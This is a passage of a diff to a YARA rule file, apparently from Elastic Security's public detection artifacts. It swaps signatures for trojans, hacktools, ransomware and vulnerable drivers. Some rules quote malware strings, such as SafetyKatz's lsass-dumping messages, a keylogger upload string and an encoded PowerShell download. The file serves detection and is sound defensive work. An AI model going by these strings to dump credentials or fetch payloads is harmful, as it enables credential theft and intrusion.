57 FF 15 D0 70 00 10 8B E8 A1 8C DD 00 10 85 C0 75 6A 68 B8 0B 00 00 FF 15 70 70 00 10 } + $b2 = { A1 90 DD 00 10 53 56 57 85 C0 75 3E 8B 1D 60 71 00 10 8B 3D 70 70 00 10 6A 00 FF D3 83 C4 04 A3 } + $b3 = { 56 8B 74 24 08 57 8B 3D 70 70 00 10 56 E8 2E FF FF FF 83 C4 04 A3 8C DD 00 10 85 C0 75 09 68 88 } condition: - $guid or ( all of ($str*) and 1 of ($print_str*)) + 5 of ($a*) or 1 of ($b*) } -rule ELASTIC_Windows_Trojan_Backoff_22798F00 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Clroxide_D92D9575 : FILE MEMORY { meta: - description = "Detects Windows Trojan Backoff (Windows.Trojan.Backoff)" + description = "Detects Windows Hacktool Clroxide (Windows.Hacktool.ClrOxide)" author = "Elastic Security" - id = "22798f00-ff2a-4f5f-a9ef-fab6d04ca679" - date = "2022-08-10" - modified = "2022-09-29" + id = "d92d9575-9ad9-464f-95a3-8e100666d7fa" + date = "2024-02-29" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Backoff.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "65b5aff18a4e0bc29d7cc4cfbe2d5882f99a855727fe467b2ba2e2851c43d21b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_ClrOxide.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3a4900eff80563bff586ced172c3988347980f902aceef2f9f9f6d188fac8e3" + logic_hash = "01bb071e1286bb139c5e1c37e421153ef1b28a5994feeaedf6ad27ad7dade5e9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a45fc701844e6e0cfba5d8ef90d00960b5817af66e6b3d889a54d33539cd5d41" + fingerprint = "b403acddadc5adb982a9ee0e0513ecd471b728680cc9a6cd8cd8150eb9c02776" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81780,186 +82280,180 @@ rule ELASTIC_Windows_Trojan_Backoff_22798F00 : FILE MEMORY os = "windows" strings: - $str1 = "\\nsskrnl" fullword - $str2 = "Upload KeyLogs" fullword - $str3 = "&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s" fullword - $str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword - $str5 = "\\OracleJava\\Log.txt" fullword - $str6 = "[Ctrl+%c]" fullword + $s1 = "clroxide..primitives..imethodinfo" + $s2 = "clroxide..clr..Clr" + $s3 = "\\src\\primitives\\icorruntimehost.rs" + $s4 = "\\src\\primitives\\iclrruntimeinfo.rs" + $s5 = "\\src\\primitives\\iclrmetahost.rs" + $s6 = "clroxide\\src\\clr\\mod.rs" + $s7 = "__clrcall" condition: - 3 of them + 2 of them } -rule ELASTIC_Windows_Vulndriver_Elrawdisk_F9Fd1A80 : FILE +rule ELASTIC_Linux_Trojan_Getshell_98D002Bf : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Elrawdisk (Windows.VulnDriver.ElRawDisk)" + description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" author = "Elastic Security" - id = "f9fd1a80-048f-437f-badb-85d984af202d" - date = "2022-10-07" - modified = "2023-06-13" + id = "98d002bf-63b7-4d11-98ef-c3127e68d59c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_ElRawDisk.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ed4f2b3db9a79535228af253959a0749b93291ad8b1058c7a41644b73035931b" - logic_hash = "43f9f1f6ad6c1defe2f0d6dd0cd380bea1a8ead19bc0bf203bdfe4f83b9c284d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Getshell.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "97b7650ab083f7ba23417e6d5d9c1d133b9158e2c10427d1f1e50dfe6c0e7541" + logic_hash = "358575f55910b060bde94bbc55daa9650a43cf1470b77d1842ddcaa8b299700a" score = 75 quality = 75 - tags = "FILE" - fingerprint = "3d9dedd033cf07920eaa99b0d1fb654057def2bcef10080b45e1e8a285db8a4e" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "b7bfec0a3cfc05b87fefac6b10673491b611400edacf9519cbcc1a71842e9fa3" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\elrawdsk.pdb" + $a = { B2 6A B0 03 CD 80 85 C0 78 02 FF E1 B8 01 00 00 00 BB 01 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Trojan_Whispergate_9192618B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Getshell_213D4D69 : FILE MEMORY { meta: - description = "Detects Windows Trojan Whispergate (Windows.Trojan.WhisperGate)" + description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" author = "Elastic Security" - id = "9192618b-4f3e-4503-a97f-3c4420fb79e0" - date = "2022-01-17" - modified = "2022-01-17" - reference = "https://www.elastic.co/security-labs/operation-bleeding-bear" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_WhisperGate.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78" - logic_hash = "28bb08d61d99d2bfc49ba18cdbabc34c31a715ae6439ab25bbce8cc6958ed381" + id = "213d4d69-5660-468d-a98c-ff3eef604b1e" + date = "2021-06-28" + modified = "2021-09-16" + reference = "05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Getshell.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2075def88b31ac32e44c270ab20273c8b91f37e25a837c0353f76bcf431cdcb3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "21f2a5b730a86567e68491a0d997fc52ba37f28b2164747240a74c225be3c661" - severity = 100 + fingerprint = "60e385e4c5eb189785bc14d39bf8a22c179e4be861ce3453fbcf4d367fc87c90" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "https://cdn.discordapp.com/attachments/" wide - $a2 = "DxownxloxadDxatxxax" wide fullword - $a3 = "powershell" wide fullword - $a4 = "-enc UwB0AGEAcgB0AC" wide fullword - $a5 = "Ylfwdwgmpilzyaph" wide fullword + $a = { EC 01 00 00 00 EB 3C 8B 45 EC 48 98 48 C1 E0 03 48 03 45 D0 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Godropper_Bae099Bd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Getshell_3Cf5480B : FILE MEMORY { meta: - description = "Detects Linux Trojan Godropper (Linux.Trojan.Godropper)" + description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" author = "Elastic Security" - id = "bae099bd-c19a-4893-96e8-63132dabce39" - date = "2021-04-06" + id = "3cf5480b-bb21-4a6e-a078-4b145d22c79f" + date = "2021-06-28" modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Godropper.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "704643f3fd11cda1d52260285bf2a03bccafe59cfba4466427646c1baf93881e" - logic_hash = "ef6274928f7cfc0312122ac3e4153fb0a78dc7d5fb2d68db6cbe4974f5497210" + reference = "0e41c0d6286fb7cd3288892286548eaebf67c16f1a50a69924f39127eb73ff38" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Getshell.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "87b0db74e81d4f236b11f51a72fba2e4263c988402292b2182d19293858c6126" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5a7b0906ebc47130aefa868643e1e0a40508fe7a25bc55e5c41ff284ca2751e5" - severity = 100 + fingerprint = "3ef0817445c54994d5a6792ec0e6c93f8a51689030b368eb482f5ffab4761dd2" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { FF FF FF FF 88 DB A2 31 03 A3 5A 5C 9A 19 0E DB } + $a = { B2 24 B0 03 CD 80 85 C0 78 02 FF E1 B8 01 00 00 00 BB 01 00 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Mountlocker_126A76E2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Getshell_8A79B859 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Mountlocker (Windows.Ransomware.Mountlocker)" + description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" author = "Elastic Security" - id = "126a76e2-8a97-4347-ac36-9437a512e16c" - date = "2021-06-10" - modified = "2021-08-23" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Mountlocker.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4a5ac3c6f8383cc33c795804ba5f7f5553c029bbb4a6d28f1e4d8fb5107902c1" - logic_hash = "5a5e157a245a75033abbe6bc7aa66fe6af6d91dc30abe1fdadce85f8f3905b1e" + id = "8a79b859-654c-4082-8cfc-61a143671457" + date = "2021-06-28" + modified = "2021-09-16" + reference = "1154ba394176730e51c7c7094ff3274e9f68aaa2ed323040a94e1c6f7fb976a2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Getshell.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2aa3914ec4cc04e5daa2da1460410b4f0e5e7a37c5a2eae5a02ff5f55382f1fe" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "08213f4474c7c8fd7a6e59c9ff139fb45f224109ad4e6162c12cff5ac85cb10c" - severity = 100 + fingerprint = "5a95d1df94791c8484d783da975bec984fb11653d1f81f6397efd734a042272b" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "[SKIP] locker.dir.check > black_list name=%s" wide fullword - $a2 = "[OK] locker.dir.check > name=%s" wide fullword - $a3 = "[ERROR] locker.worm > execute pcname=%s" wide fullword - $a4 = "[INFO] locker.work.enum.net_drive > enum finish name=%s" wide fullword - $a5 = "[WARN] locker.work.enum.server_shares > logon on server error=%u pcname=%s" wide fullword + $a = { 0A 00 89 E1 6A 1C 51 56 89 E1 43 6A 66 58 CD 80 B0 66 B3 04 } condition: - any of them + all of them } -rule ELASTIC_Windows_Vulndriver_Dbutil_Ffe07C79 : FILE +rule ELASTIC_Windows_Hacktool_Safetykatz_072B7370 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Dbutil (Windows.VulnDriver.DBUtil)" + description = "Detects Windows Hacktool Safetykatz (Windows.Hacktool.SafetyKatz)" author = "Elastic Security" - id = "ffe07c79-d97b-43ba-92b9-206bb4c7bdd4" - date = "2022-04-04" - modified = "2022-04-04" + id = "072b7370-517b-45dc-af23-ba3adbd32fbd" + date = "2022-11-20" + modified = "2023-01-11" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_DBUtil.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3" - logic_hash = "18b1c93c395b105f446b4c968441e0a43e42b1bd7efcf6501a89eb92cbd21824" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SafetyKatz.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "89a456943cf6d2b3cd9cdc44f13a23640575435ed49fa754f7ed358c1a3b6ba9" + logic_hash = "cedd3ede487371a8e0d29804f2b81ae808c7ad01bd803fa39dc2c50e472cff43" score = 75 - quality = 75 - tags = "FILE" - fingerprint = "16c22aba1e8c677cc22d3925dd7416a3c55c67271940289936a2cdc199a53798" - severity = 50 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "f0d11341fc91d2c45c07c6079aad24a11da03320286216be0a68461b6bf55b02" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "\\DBUtilDrv2_32.pdb" + $guid = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii wide nocase + $print_str0 = "[X] Not in high integrity, unable to grab a handle to lsass!" ascii wide fullword + $print_str1 = "[X] Dump directory \"{0}\" doesn't exist!" ascii wide fullword + $print_str2 = "[X] Process is not 64-bit, this version of Mimikatz won't work yo'!" ascii wide fullword + $print_str3 = "[+] Dump successful!" ascii wide fullword condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + $guid or all of ($print_str*) } -rule ELASTIC_Windows_Vulndriver_Dbutil_852Ba283 : FILE +rule ELASTIC_Windows_Hacktool_Cpulocker_73B41444 : FILE { meta: - description = "Detects Windows Vulndriver Dbutil (Windows.VulnDriver.DBUtil)" + description = "Detects Windows Hacktool Cpulocker (Windows.Hacktool.CpuLocker)" author = "Elastic Security" - id = "852ba283-6a03-44b6-b7e2-b00d1b0586e4" + id = "73b41444-4c17-4fea-b440-fe7b0a086a7f" date = "2022-04-04" modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_DBUtil.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5" - logic_hash = "78acd081c2517f9c53cb311481c0cc40cc3699b222afc290da1a3698e7bf75b7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_CpuLocker.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dbfc90fa2c5dc57899cc75ccb9dc7b102cb4556509cdfecde75b36f602d7da66" + logic_hash = "8fb33744326781c51bb6bd18d0574602256b813b62ec8344d5338e6442bb2de0" score = 75 quality = 75 tags = "FILE" - fingerprint = "aec919dfea62a8ed01dde4e8c63fbfa9c2a9720c144668460c00f56171c8db25" + fingerprint = "3f90517fbeafdccd37e4b8ab0316a91dd18a911cb1f4ffcd4686ab912a0feab4" severity = 50 arch_context = "x86" scan_context = "file" @@ -81967,449 +82461,455 @@ rule ELASTIC_Windows_Vulndriver_Dbutil_852Ba283 : FILE os = "windows" strings: - $str1 = "\\DBUtilDrv2_64.pdb" + $str1 = "\\CPULocker.pdb" condition: int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Windows_Trojan_Trickbot_01365E46 : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" - author = "Elastic Security" - id = "01365e46-c769-4c6e-913a-4d1e42948af2" - date = "2021-03-28" - modified = "2021-08-23" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5c450d4be39caef1d9ec943f5dfeb6517047175fec166a52970c08cd1558e172" - logic_hash = "4d61de2cb37e12f62326c1717f6ed44554f5d2aa7ede6033d0c988e5e64df54d" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "98505c3418945c10bf4f50a183aa49bdbc7c1c306e98132ae3d0fc36e216f191" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "windows" - - strings: - $a = { 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C } - - condition: - all of them -} -rule ELASTIC_Windows_Trojan_Trickbot_06Fd4Ac4 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Fontonlake_68Ad8568 : FILE MEMORY { meta: - description = "Identifies Trickbot unpacker" + description = "Detects Linux Hacktool Fontonlake (Linux.Hacktool.Fontonlake)" author = "Elastic Security" - id = "06fd4ac4-1155-4068-ae63-4d83db2bd942" - date = "2021-03-28" - modified = "2021-08-23" + id = "68ad8568-2b00-4680-a83f-1689eff6099c" + date = "2021-10-12" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "bde387f1e22d1399fb99f6d41732a37635d8e90f29626f2995914a073a7cac89" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Fontonlake.yar#L1-L30" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "717953f52318e7687fc95626561cc607d4875d77ff7e3cf5c7b21cf91f576fa4" + logic_hash = "63dd5769305c715e27e3c62160f7b0f65b57204009ed46383b5b477c67cfac8e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ece49004ed1d27ef92b3b1ec040d06e90687d4ac5a89451e2ae487d92cb24ddd" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "81936e696a525cf02070fa7cfa27574cdad37e1b3d8f278950390a1945c21611" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 5F 33 C0 68 ?? ?? 00 00 59 50 E2 FD 8B C7 57 8B EC 05 ?? ?? ?? 00 89 45 04 } + $s1 = "run_in_bash" + $s2 = "run_in_ss" + $s3 = "real_bash_fork" + $s4 = "fake_bash_add_history" + $s5 = "hook_bash_add_history" + $s6 = "real_bash_add_history" + $s7 = "real_current_user.5417" + $s8 = "real_bash_execve" + $s9 = "inject_so_symbol.c" + $s10 = "/root/rmgr_ko/subhook-0.5/subhook_x86.c" + $s11 = "|1|%ld|%d|%d|%d|%d|%s|%s" + $s12 = "/proc/.dot3" condition: - all of them + 4 of them } -rule ELASTIC_Windows_Trojan_Trickbot_Ce4305D1 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_28B13E67 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "ce4305d1-8a6f-4797-afaf-57e88f3d38e6" - date = "2021-03-28" - modified = "2021-08-23" + id = "28b13e67-e01c-45eb-aae6-ecd02b017a44" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L41-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c547114475383e5d84f6b8cb72585ddd5778ae3afa491deddeef8a5ec56be1b5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0b50a38749ea8faf571169ebcfce3dfd668eaefeb9a91d25a96e6b3881e4a3e8" + logic_hash = "586ae19e570c51805afd3727b2e570cdb1c48344aa699e54774a708f02bc3a6f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ae606e758b02ccf2a9a313aebb10773961121f79a94c447e745289ee045cf4ee" + fingerprint = "1e85be4432b87214d61e675174f117e36baa8ab949701ee1d980ad5dd8454bac" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { F9 8B 45 F4 89 5D E4 85 D2 74 39 83 C0 02 03 C6 89 45 F4 8B } + $a = { 05 A5 A3 A9 37 D2 05 13 E9 3E D6 EA 6A EC 9B DC 36 E5 76 A7 53 B3 0F 06 46 D1 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_1E56Fad7 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_75C8Cb4E : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "1e56fad7-383f-4ee0-9f8f-a0b3dcceb691" - date = "2021-03-28" - modified = "2021-08-23" + id = "75c8cb4e-f8bd-4a2c-8a5e-8500e12a9030" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L60-L77" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "815b37804f79fb4607e6b84294882d818233c3df13aececb3d341244900a2e44" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3d69912e19758958e1ebdef5e12c70c705d7911c3b9df03348c5d02dd06ebe4e" + logic_hash = "527fecb8460c0325c009beddd6992e0abbf8c5a05843e4cedf3b17deb4b19a1c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a0916134f47df384bbdacff994970f60d3613baa03c0a581b7d1dd476af3121b" + fingerprint = "db68c315dba62f81168579aead9c5827f7bf1df4a3c2e557b920fa8fbbd6f3c2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 5B C9 C2 18 00 43 C1 02 10 7C C2 02 10 54 C1 02 10 67 C1 02 10 } + $a = { 35 EE 19 00 00 EA 80 35 E8 19 00 00 3B 80 35 E2 19 00 00 A4 80 35 DC 19 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_93C9A2A4 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_17B564B4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "93c9a2a4-a07a-4ed4-a899-b160d235bf50" - date = "2021-03-28" - modified = "2021-08-23" + id = "17b564b4-7452-473f-873f-f907b5b8ebc4" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L79-L96" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "dadeeba6147b118b80e014ab067eac7a2c3c2990958a6c7016562d8b64fef53c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "94f6e5ee6eb3a191faaf332ea948301bbb919f4ec6725b258e4f8e07b6a7881d" + logic_hash = "40cd2a793c8ed51a8191ecb9b358f50dc2035d997d0f773f6049f9c272291607" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0ff82bf9e70304868ff033f0d96e2a140af6e40c09045d12499447ffb94ab838" + fingerprint = "7701fab23d59b8c0db381a1140c4e350e2ce24b8114adbdbf3c382c6d82ea531" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { 6A 01 8B CF FF 50 5C 8B 4F 58 49 89 4F 64 8B 4D F4 8B 45 E4 } + $a = { 35 D9 11 00 00 05 80 35 D3 11 00 00 2B 80 35 CD 11 00 00 F6 80 35 C7 11 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_5340Afa3 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_C90C088A : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = "5340afa3-ff90-4f61-a1ac-aba1f32dd375" - date = "2021-03-28" - modified = "2021-08-23" + id = "c90c088a-abf5-4e52-a69e-5a4fd4b5cf15" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L98-L115" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8b9d3c978f0c4a04ee5b3446b990172206b17496036bc1cc04180ea7e9b99734" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Bundlore.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "875513f4ebeb63b9e4d82fb5bff2b2dc75b69c0bfa5dd8d2895f22eaa783f372" + logic_hash = "c82c5c8d1e38e0d2631c5611e384eb49b58c64daeafe0cc642682e5c64686b60" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7da4726ccda6a76d2da773d41f012763802d586f64a313c1c37733905ae9da81" + fingerprint = "c2300895f8ff5ae13bc0ed93653afc69b30d1d01f5ce882bd20f2b65426ecb47" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $a = { E8 0C 89 5D F4 0F B7 DB 03 5D 08 66 83 F8 03 75 0A 8B 45 14 } + $a = { 35 E1 11 00 00 92 80 35 DB 11 00 00 2A 80 35 D5 11 00 00 7F 80 35 CF 11 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Trickbot_E7932501 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Bundlore_3965578D : FILE MEMORY { meta: - description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" + description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" author = "Elastic Security" - id = 